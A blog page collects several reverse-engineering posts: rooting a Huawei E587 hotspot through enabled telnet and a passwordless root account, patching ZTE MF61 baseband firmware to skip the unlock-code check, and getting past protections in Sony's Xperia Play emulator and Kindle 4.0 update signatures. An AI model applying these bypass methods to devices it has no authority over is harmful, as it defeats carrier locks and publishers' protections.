Yep, setting TelnetStatus to 1 and restoring the backup database showed me that port 23 was now open from the hotspot’s IP. Well, that was extremely lucky, as always the best hacks are the one which doesn’t require hacking at all. Well that was only half the challenge, the next part is getting access to the root account. I’m thinking everything from brute forcing passwords to looking at privilege escalation exploits but all of that disappeared as soon as I typed “root” and enter because there was no password prompt. That’s right, “root” doesn’t require a password. I did a quick inventory of the filesystem and found the block devices, and using the magic of dd, nc, and the old Unix pipe, quickly dumped all the filesystems.


Here’s the thing though, I spent all this time (almost 45 minutes at this point!) rooting the device and I don’t even have a clear goal. I don’t need to unlock the device because I was a T-Mobile customer at that point, and I didn’t really want to make a pocket ARM computer/server (which would be a thing one can do with this), so I just did a quick scan of how the device works (curiosity is the best excuse) and went my way. Here’s some of the things I’ve discovered, use this information how you will.

First of all, the device runs a stripped down build of Android running “Linux version 2.6.31 (e5@e587) (gcc version 4.4.0 (GCC) ) #1 Sun Aug 28 02:25:47 CST 2011.” On startup, most of the vanilla Android processes (including adbd) are not started, but instead the Qualcomm modem driver, some pppd/networking daemons, and a custom software they call “cms” are started. “cms” makes sure stuff like their custom httpd (which is hard coded to allow the HTML portal site to perform functions on the hotspot) and power management and the OLED display are running and in good status. The Huawi device stores all data on its flash MTD device. From a quick analysis (aka, might be errors), block 0 contains the u-boot bootloader (in what I believe is a format dictated by FreeScale), block 3 contains the kernel (gzipped with a custom header, possible also dictated by FreeScale), block 4 contains the rootfs (also gzipped with a custom header) loaded with boot scripts and busybox, block 5 is Android’s /system which also contains the main binaries (like cms, httpd) and the HTML pages, block 6 is Android’s /data which is empty, block 8 maps to /mnt/backup which I believe is, as the name says, just backups, block 12 maps to /mnt/flash which I believe is where ephemeral data like logs are and also where the settings are stored, and block 13 maps to /mnt/cdrom which has Huewai’s software and drivers for connecting to the computer with (and you see it when you plug the device into your computer).

That’s a quick summary of some of the things I’ve found while poking around this device. Nothing interesting (unless you’re a Huawei E587 fanatic I guess), but I’m sure there’s someone, someday, who got here from Google.

Unlocking T-Mobile 4G Hotspot (ZTE MF61): A case study

So, I have one of these MiFi clone from T-Mobile and want to unlock it to use on AT&T (I know that AT&T 4G/3G isn’t supported, but I thought maybe I could fix that later). The first thing I tried to do was contact T-Mobile, as they are usually very liberal concerning unlock codes. However, this time, T-Mobile (or, as they claim, the manufacture) isn’t so generous. So I’ve decided to take it upon myself to do it. I will write down the entire procedure here as a case study on how to “reverse engineer” a new device. However, in no way do I consider myself an expert, so feel free to bash me in the comments on what I did wrong. Also, I have decided against releasing any binaries or patches because phone unlocking is a grey area (although it is legal here), but if you read along you should be able to repeat what I did, even though I will also try to generalize.

Getting information

The hardest part of any hack is the figuring-out-how-to-start phase. That’s always tricky. But… let the games begin.

-Wheatley, Portal 2

So before we can do anything, we need to know what to do. The best place to begin is to look at the updater. A quick look at the extracted files, we find that the files being flashed have names such as “amss.mbn”, “dsp1.mbn”, and such. A quick scan with a hex editor, we see that the files are unencrypted and unsigned. That’s good news because it means we have the ability to change the code. A quick Google search shows us that these files are firmware files for Qualcomm basebands. Now, we need to find more information on this Qualcomm chip. You may try some more Google-fu, but I took another path and took apart the device (not recommended if it’s any more complicated). In this case, I found that we are dealing with a Qualcomm MDM8200A device. Google that and you’ll find more information such as there are two DSP processors for the modem and on “apps” ARM processor (presumably for T-Mobile’s custom firmare, and is what you see as the web interface). We want to unlock the device, so I assume the work is done in the DSP processor. That’s the first problem. QDSP6 (I found this name through more Google skills) is not a supported processor in IDA Pro, my go-to tool, so we need another way to disassemble it.


Some more Googling (I’m sure you can see a pattern on how this works now) leads me to this. QDSP6 is actually called “Hexagon” by Qualcomm and they kindly provided an EBI and programmer’s guide. I guessed from the documents that there is a toolchain, but no more information is provided about it. More searching lead me to believe that the in-house toolchain is proprietary, but luckily, there is an open source implementation that is being worked on. Having the toolchain means that we can use “objdump”, the 2nd most popular disassembly tool [Citation Needed]. So, it’s just a matter of sending dsp1.mbn and dsp2.mbn into objdump -x? Nope. It seems that our friends at ZTE either purposely or automatically (as part of the linker) stripped the “section headers” of the ELF file. I did a quick read of the ELF specifications and found that the “section headers” are not required for the program to run, but provides information for linking and such. What we did have was the “program headers”, which is sort of a stripped down version of the section headers. (Program headers only tell: 1) where each “section” is located in file and where to load it in memory, 2) is it program or data?, 3) readable? writable?, while section headers give more information like the name of each section and more on what the program/data section’s purpose is). What I then did is wrote my own section headers using the program headers as a guide and made up the names and other information (because they are not used in the actual disassembling anyways) with a hex editor. Then I pasted my headers into the file, changed some offsets, and objdump -x surrendered the assembly code. 180MB worth of it.


So we have 180MB worth of code written in a language that could very well be greek. Luckily, as I’ve mentioned earlier, Qualcomm released a document detailing the QDSP assembly language and how it’s used. Most likely, you would be dealing with a more “popular” processor like ARM or x86 and would have access to more resources. However, for QDSP6/Hexagon, we have two PDF documents and that is basically the Bible that we need to memorize. I then spend a couple of hours learning this new assembly language (assembly isn’t that hard once you embrace it) and figured out the basics needed to reverse engineer (that is: jumps, store/loads, and arithmetic). Now, another problem arises. We have literally 3 million lines of assembly code with no function names, no symbols, and no “sections”. How do we find where the goal (the function that checks the NCK key and unlocks the device accordantly) without spending the next two years decoding this mess? Here, we need to do some assumptions. First, we know   (through Google) that the AT modem command for inputting the NCK key is AT+ZNCK=”keyhere” for ZTE devices. So, let’s look for “ZNCK” in the hex editor of dsp1.mbn and dsp2.mbn. (If you are not as lucky and don’t know what the AT command is, I would put money that the command will contain the word NCK, so just search that). In dsp2.mbn, we find a couple of results. One of the results is in a group of other AT commands. Each command is next to a 4-byte hex value and a bunch of zero padding. I would guess that it is a jump table and the hex values are the memory locations of the functions to jump to. Doing a quick memory to file offset conversion (from our ELF program header), we locate the offset in our disassembly dump to find that it starts an “allocframe” instruction. That means we are at the beginning of a function so our assumptions must be right. Now, we can get to the crux of the problem, which is figuring out how the keycheck works.

Mapping out the functions

We now know where the function of interest starts, but we don’t know where it ends. It’s easy to find out though, look for a jump to lr (in this case for this processor, it’s a instruction to jump r31). We start at the beginning of the function and we copy all the instruction until we see a non-conditional jump. We paste the data into another text file (for easier reference). Then we go to the next location in the disassembly (where it would have jumped to) and copy the instruction until we see another non-conditional jump, and then paste them into the second text file. Keep doing this until you see a jump to r31. We now have most of the function. Notice I kept saying “non-conditional” jumps. That’s because first, we just need the code that ALWAYS runs, just to filter out stuff we don’t need. Now, we should get the other branches just so we have more information. To do this, just follow each jump or function call in the same way as we did for the main function. I would also recommend writing some labels like “branch1″ and “func1″ for each jump just so you can easily locate two jumps to the same location and such. I would also recommend only doing this up to three “levels” max (three function calls or three jumps) because it could get real messy real quick, and we will need more information so we can filter out un-needed code, as I will detail in the next section.

Finding data references

Right now, we are almost completely blind. All we know is what code is run. We don’t know the names of functions or what they do, and it would take forever to “map” every function and every function every function calls (and so on). So we need to obtain some information. The best would be to see what data the code is using. For this processor (and likely many others), a “global pointer” is used to refer to some constant data. So, look for references to “gp” in the disassembly. Searching from the very beginning of the program, we find that the global pointer is set to 0×3500000, and according to the ELF headers, that is a section of the dsp2.mbn file at some file offset. In the section we care about, look for references to “gp” and use the offsets you find to locate the data they refer to. I would recommend adding some comments about them in the code so we don’t forget about them. Now, the global pointer isn’t everything, we can have regular hard-coded pointers to constant areas of memory. Look for setting of registers to large numbers. These are likely parameters to function calls that are too big to be just numerical data and are more likely pointers. Use the ELF header to translate the memory locations to file offsets. In this case (for this processor), some values may be split into rS.h and rS.l, these are memory locations that are too “large” to be set in the register at once. Just convert rS.h into a 16 bit integer, rS.l into a 16 bit integer (both might require zero padding in front), then combine them into one 32 bit integer where rS.h’s value is in front of rS.l’s value. For example, we have: r1.h = #384; r1.l = #4624. That will make r1 == 0×1801210. You should also make some comments in the code about the data that is being used. Now, predict standard library calls. This may be the hardest step because it involves guessing and incorrect guessing may make other guess more wrong. You don’t have much information to go by, but you know 1) the values of some of the data being passed into function calls, and 2) library calls will usually be near the start of the program, or at least very far away from the current function. This will be harder if the function you are trying to map is already near the beginning of the program. The function I’m mapping is found at 0xf84c54, and most function calls are close to it. When I see a function call to 0xb02760, I know that it might be a library call. 3) Some of the more “common” functions and the types of parameters they accept. You don’t need to figure out all of the library calls, just enough to get an idea of what the code is doing so you don’t try to map out these functions (trying to map out strcpy, for example will get messy real quick). For example, one function call, I see is taking in a data pointer from a “gp” offset, a string that contains “%s: %d”, and some more data. I will assume it is calling fprintf(). I see another function is being called many times throughout the code, and it always accepts two pointers where the second one may be a constant and a number. I will assume it is calling memcpy().


This may be the most boring part. You should have enough information now to try to write a higher language code that does what the assembly code says. I would recommend doing this because it is much easier to see logic this way. I used C and started by doing a “literal” transcription using stuff like “r0-r31″ as variable names and using goto. Then go back and try to simplify each section. In my process, I found that how the unlock key is checked is though sort of a hash function. It takes the user input, passes it through a huge algorithm of and/or/add/sub of more than 1000 lines and takes the result and compares it to a hard coded value in the NV ram (storage area for the device). Here, I made a choice to not go through and re-code this algorithm for two reasons. First, it would be of little use, as the key check doesn’t use a known value like the IMEI and relies on a hard coded value in the NV ram that you need to extract (which a regular user might have trouble doing). Second, after decoding it, we would have to do the algorithm backwards to find the key from the “known value” in the NV ram (and it could be that it would be impossible to work backwards). So I took the easy way out and made a 4-byte patch in where I let the program compare the known value to itself instead of to the generated hash from the input and flashed it to the device. Then I inputted a random key, and the device was unlocked.

Now, remember at the beginning I said the code was unsigned? Because of that I could easily have reflashed the firmware with my “custom” code. However, if your device has some way of preventing modified code from running, you may have no choice but to decode the algorithm.

Playstation Vita’s USB MTP Connection Analyzed

This is the first of (hopefully) many posts on the PS Vita. Before I attempt anything drastic with the device, such as getting unsigned code to run, I hope I can try something easy (well, easier) to get used to the device. Ultimately, I want to make a content manager for the PS Vita for Linux. Unlike the PSP, the Vita does not export the memory card as a USB storage device, but instead relies on their custom application to copy content to and from the device. This post will give just a peek into how the communication between the Vita and the PC works.

There are two ways of approaching this. One is to sniff the USB packets to figure out what data gets sent to and from the device, and second is to disassemble the content manager application to find out how it communicates with the device. I tried both methods.

Reverse engineering the Content Manager

The biggest problem here is that the PC version of Sony’s content manager has its symbols removed. This makes everything a hundred times harder as you would have a harder time guessing what each function does. Luckily, the OSX version of the content manager does have the symbols intact. The problem here is that IDA does not work perfectly with Objective-C (it works, but you get a C++ish interpretation of Objective-C). I have a good idea of how the application is laid out, but there isn’t much point giving all the details (not useful). I will give some important points:

  • The Vita uses the Media Transfer Protocol, however I am not sure if it adheres completely to standards or if it uses a custom implementation
  • USB endpoint 0×2 is for input, while 0×81 is for data output, and 0×83 is for MTP event output
  • There is support for passing PSN account information to and from the Vita (password would be in plain text!), but it is unimplemented
  • CMA uses a SQLite database to index media information and licenses
Also, I’ve compiled a list of MTP operation codes for the Vita that are referenced in CMA (and therefore implemented in the Vita). Note that some of the codes are not in the standards while others are. For events, the second number is for reference with regards to the jump-table inside CMA only.

0xC104 0: RequestSendNumOfObject
0xC105 1: RequestSendObjectMetadata
0xC107 3: RequestSendObject
0xC108 4: RequestCancelTask
0xC10B 7: RequestSendHttpObjectFromURL
0xC10F 11: RequestSendObjectStatus
0xC110 12: RequestSendObjectThumb
0xC111 13: RequestDeleteObject
0xC112 14: RequestGetSettingInfo
0xC113 15: RequestSendHttpObjectPropFromURL
0xC115 17: RequestSendPartOfObject
0xC117 19: RequestOperateObject
0xC118 20: RequestGetPartOfObject
0xC119 21: RequestSendStorageSize
0xC120 28: RequestCheckExistance
0xC122 30: RequestGetTreatObject
0xC123 31: RequestSendCopyConfirmationInfo
0xC124 32: RequestSendObjectMetadataItems
0xC125 33: RequestSendNPAccountInfo
0xC801 1789: Unimplemented (seen when getting object from Vita)

0x1001: GetDeviceInfo
0x1002: OpenSession
0x1007: GetObjectHandles
0x1008: GetObjectInfo
0x1009: GetObject
0x100C: SendObjectInfo
0x100D: SendObject
0x101B: GetPartialObject
0x9511: GetVitaInfo
0x9513: SendNumOfObject
0x9514: GetBrowseInfo
0x9515: SendObjectMetadata
0x9516: SendObjectThumb
0x9518: ReportResult
0x951C: SendInitiatorInfo
0x951F: GetUrl
0x9520: SendHttpObjectFromURL
0x9523: SendNPAccountInfo
0x9524: GetSettingInfo
0x9528: SendObjectStatus
0x9529: SendHttpObjectPropFromUR
0x952A: SendHostStatus
0x952B: SendPartOfObject (?)
0x952C: SendPartOfObject (?)
0x952E: OperateObject
0x952F: GetPartOfObject
0x9533: SendStorageSize
0x9534: GetTreatObject
0x9535: SendCopyConfirmationInfo (?)
0x9536: SendObjectMetadataItems
0x9537: SendCopyConfirmationInfo (?)
0x9538: KeepAlive
0x9802: ?
0x9803: GetObjectPropValue
0x9805: GetObjectPropList

0x2001: OK
0x2002: GeneralError
0x2006: ParameterNotSupported
0x2007: IncompleteTransfer
0x200C: StoreFull
0x200D: ObjectWriteProtected
0x2013: StoreNotAvailable
0x201D: InvalidParameter
0xA002: ?
0xA003: ?
0xA004: ?
0xA00A: ?
0xA00D: ?
0xA008: ?
0xA010: ?
0xA012: ?
0xA017: ?
0xA018: ?
0xA01B: ?
0xA01C: ?
0xA01F: ?
0xA020: ?
0xA027: ?

Data Types:
0xDC01: StorageID
0xDC02: ObjectFormat
0xDC03: ProtectionStatus
0xDC04: ObjectSize
0xDC05: AssociationType
0xDC07: ObjectFileName
0xDC08: DateCreated
0xDC09: DateModified
0xDC0A: Keywords
0xDC0B: ParentObject
0xDC0C: AllowedFolderContents
0xDC0D: Hidden
0xDC0E: SystemObject
0xDC41: PersistentUniqueObjectIdentifier
0xDC42: SyncID
0xDC43: PropertyBag
0xDC44: Name
0xDC45: CreatedBy
0xDC46: Artist

Object Formats:
0x3000: Undefined
0x3001: Association
0x3008: WAV
0x3009: MP3
0x3801: EXIF/JPEG
0x3804: BMP
0x3806: UndefinedReserved
0x380A: PICT
0x380B: PNG
0xB007: PSPGame
0xB00A: PSPSave
0xB014: VitaGame
0xB400: ?
0xB411: MNV
0xB984: MNV2
0xB982: MP4/MGV/M4V/MNV3

USB packets

I’ve also captured the USB packets for initializing the device (from device plug-in to Vita displaying the content menu) and gave my best interpretation of it. First line is PC to Vita packet or Vita to PC packet

, followed by packets captured by VMWare running Windows 7, followed by the same action on OSX (dumped from memory using GDB on CMA, not from capturing USB packets), followed by my interpretation of what the packet does (question mark means not sure). EDIT: Some of my comments in the log I know are wrong now.

Next time

I’m hoping to decode these packets and implement them using libusb. I hope Sony is using the MTP standard so I can also make use of libmtp. I also need to be more familiar with how the USB protocol works so I can understand the packet layout better.

EDIT: I’ve begun work on a new project to create an open source content manager for the Vita. As of this post, it can init the device and tell it to show the main menu.

Reversing the Xperia Play emulator (part deux)

The last time we spoke, I managed to run any PSX game on the Xperia Play by redirecting some function calls. Well, since then Sony (you could say) fixed it (still don’t know how, I should look into it one day, I’m guessing they revoked the certificates for Crash Bandicoot) and people running Android 2.3.4 on the Xperia Play can’t use PSXPeria anymore. I’ve re-patched it a while ago, but never got the chance to modify the patching tool to use the new method (I really hate Java and don’t want to use it, so I held back.) until today. As customary to my releases, I will begin by telling more than what you want to know about how it works.

Previously on “cracking the emulator”…

If you haven’t read the last posts I’ve made about how I reverse engineered the emulator data format and binary, you may want to, but I’ll summarize it in a few words. Basically, the emulator was separated into two binaries bin-one decrypts bin-two and bin-two asks bin-one to decrypt and load the game’s table-of-contents which is used to load the game. The TOC is important because anyone can replace the game data files, but it won’t load because the TOC contains addresses of the places to decompress in the game data. Well, after the hard part of reversing the formats and finding all this out, the actual patch was fairly easy. All we did was make a new library with the same function name as the one that is used by bin-two to query bin-one for the TOC, and use it to load the TOC for our custom game and make sure that library loads before Sony’s and the rest is almost magic. We don’t need to overwrite any function pointers or even touch the emulator because the linker looks for the first definition of a function and calls it.

How Sony made our lives harder

So version 1 is always easiest to break. This applies for almost everything. The PSP, the iPhone, the DS, etc. Version 2 is where it gets real. So what are the changes? First of all, no more bi-binary system. There is a single binary that does both the decrypting and emulating. Oh, and they removed the symbols so we can no longer search for “GetImageToc” and find where the function is. Also, they’ve started verifying that ISOs.

Finding the needle

Before we can begin to think about patching, we first need to find what to patch. As I’ve mentioned, Sony removed the symbols, so we no longer know what the function names are. We CAN try to map out the entire binary (10MB) and look for something that does what appears to be decrypting a TOC, but we don’t have months or a team of assembly experts. What we DO have is the older version of the binary that has the symbols. Assuming that they didn’t rewrite the emulator from scratch, the structure should be similar. We open up the old binary, find the function that calls the ones we want to patch, and look for identifying characteristics. What are they? Well, we look for mentions of unique strings and unique calls to standard functions (unique as in something like atoi, not malloc, which is called every other line). Luckily we have both. It seems like a few lines before the function we are interested in, the program does something with the string “/data/” and sometimes afterwards, uncompress is called. Now we have the address of the functions we want to patch.

Patching the function

Well, here’s our second problem. What do we patch the function with? We are only limited to the length of what the function originally is, but I’m sure that’s not a problem for experts. I’m not an expert though, so how about we steal what Sony did in version 1? We use dlsym to call the function from a loaded binary in memory. After a quick trip to an assembly reference, I wrote the following code:, I would go into more details, but I believe my comments on the code explains it better than I could. The only other thing we need is to manually define the address for “dlsym” and the offset for the name of the function. ARM assembly uses relative address, so I haven’t come up with a quick way to do this yet. For now, I’m using a calculator and a piece of paper to find the address of dlsym relative to the patch in the program. Comment if you have a better way.

Phase 2

When the game didn’t boot and was frozen on screen, I knew it had to be another obstacle. Our code had to have worked because otherwise, it would have crashed. Debugging with GDB, it seems like the program is blocking forever, seemingly on purpose. To double check, I loaded Crash Bandicoot again, but with my patched emulator and it worked. So, I guess there was a check somewhere that only loads Crash Bandicoot. Yes, I could go back into IDA and look for where the check is and NOP it out, but I was tired by then and my short attention span wants me to work on something else, so I took the easy way out and patched the PSX image with the titleid for Crash Bandicoot. As far as I know, this shouldn’t affect anything in terms of compatibility, but farther tests are needed.

Next week on “cracking the emulator”…

Version 3 of the emulator is already out and is distributed in the PS-Suite games in the Japanese PSN store (on the Play). I already took a look at it, and the emulator did not seem to be updated, so I didn’t try hard to patch it. However, it seems that they implemented many new security mechanisms in the PS-Suite PSX games. For starters, there is a public-private key exchange to make sure all the files in the APK are untouched, and I’m pretty sure the PS-Image is now encrypted or the format has changed. Now, Sony did not do all this to prevent us from loading our own games (or maybe they did). I suspect it’s to prevent pirates from stealing the PSN games. Which means that if I crack the version 3 emulator, I may be helping piracy. This means, I will most likely not touch the PS-Suite emulators, and if I do, two things have to happen. 1) I need to be sure that the emulator has much better compatibility, and 2) I need a way to make sure that my tool isn’t going to be used for piracy. So I guess this may be the last release for a while.


Project Page

Analyzing Kindle 4.0

Well, Amazon might as well have stolen my wallet, because I am going to lose a couple hundreds of dollars. However, what fun is a Kindle if we can’t run our own code? (Answer: still pretty fun, but that’s besides the point.) Anyways, I haven’t gotten my hands on the new Kindles yet, but I got the next best thing: a software update from Amazon (

If you want to follow me and others try to crack this thing, visit this thread on MobileRead.

I’ll post some of the more important stuff we find on this post, so check back regularly.

  • The update format has changed! No more signatures for each file in the update, the update itself is signed and will refuse to extract unless the signature check passes. That means no more easy way out. To get “” to recognize and extract the new update, remove the signature (first 0×140 bytes) and change “FC04″ to “FC02″ (Bytes 0×0 to 0×4 after trimming the signature header). Now delete 4 bytes starting from 0×8 and 6 bytes starting from 0×10. (Offsets depend on the SP01 part removed). Now “” will recognize it.
  • Kindle 4.0 is codenamed “Yoshi” following “Luigi” (3.0) and “Mario” (2.0) (I can’t remember 1.0). It is built for the iMX50 (800MHz ARM Cortex A8) platform. The Kindle 3 is iMX35 (532MHz ARM) and the Kindle 2/DX is iMX3 (400MHz ARM).

Installing Windows 8 Developer Preview (8102) on a USB Drive (Windows To Go/Portable Workspace)

This really isn’t some technical or hard to do thing, but it’s a cool little trick I found that I haven’t seen mentioned before. If you don’t know what “Windows To Go” (previously “Portable Workspace”), watch this video from the Build 2011 conference. Basically, it allows you to install a full copy of Windows 8 onto a USB drive/external hard drive and use it on any computer that supports USB booting. Your settings, files, programs, etc go where-ever you go. The feature is in Windows 8 (and the developer preview), but the program to make the drive is not. Luckily, an old leaked build has the program, but you can’t just copy and paste it, it won’t run. Instead, follow the directions below to get Windows 8 installed to a USB drive. (I used a virtual machine to do the following, therefore I did not need to burn any DVDs. I will give the directions assuming you’re using a real computer though).


  • Windows 8 Developer Preview burned to a DVD (unless you’re using virtual machine)
  • Windows 8 M1 build 7850 burned to a DVD (unless you’re using virtual machine)
  • 16GB flash drive or external hard drive (or larger)
  1. Install Windows 8 M1 build 7850. (I tried just copying pwcreator.exe and running it on a later build, but it didn’t work.)
  2. Open the start menu and type in “pwcreator.exe” and press enter. Alternatively, find and open C:\Windows\System32\pwcreator.exe
  3. Choose your USB drive and continue.
  4. Insert the Windows 8 M1 build 7850 DVD again and continue.
  5. Before starting the build process, take out the Windows 8 M1 build 7850 DVD and insert your Windows 8 Developer Preview build 8102 DVD.
  6. Continue and allow the process to finish.
I tested it with the x86 version of the Developer Preview, so I don’t know how well or if it will work with the x64 build. When you are asked to activate Windows, you can skip it or enter one of the keys found in the Developer Preview DVD under D:\Sources\product.ini (assuming D: is your DVD). I haven’t figured out which key to use yet.
Also, the requirements in pwcreator.exe states that you need a 16GB USB drive. However Windows only really need 12GB to install. I have a 16GB flash drive that shows up as 15GB and it wouldn’t work. I used GParted in Ubuntu to copy the partitions from a larger USB drive over after creating the image and it works fine. Just a tip.
Page 1 of 3123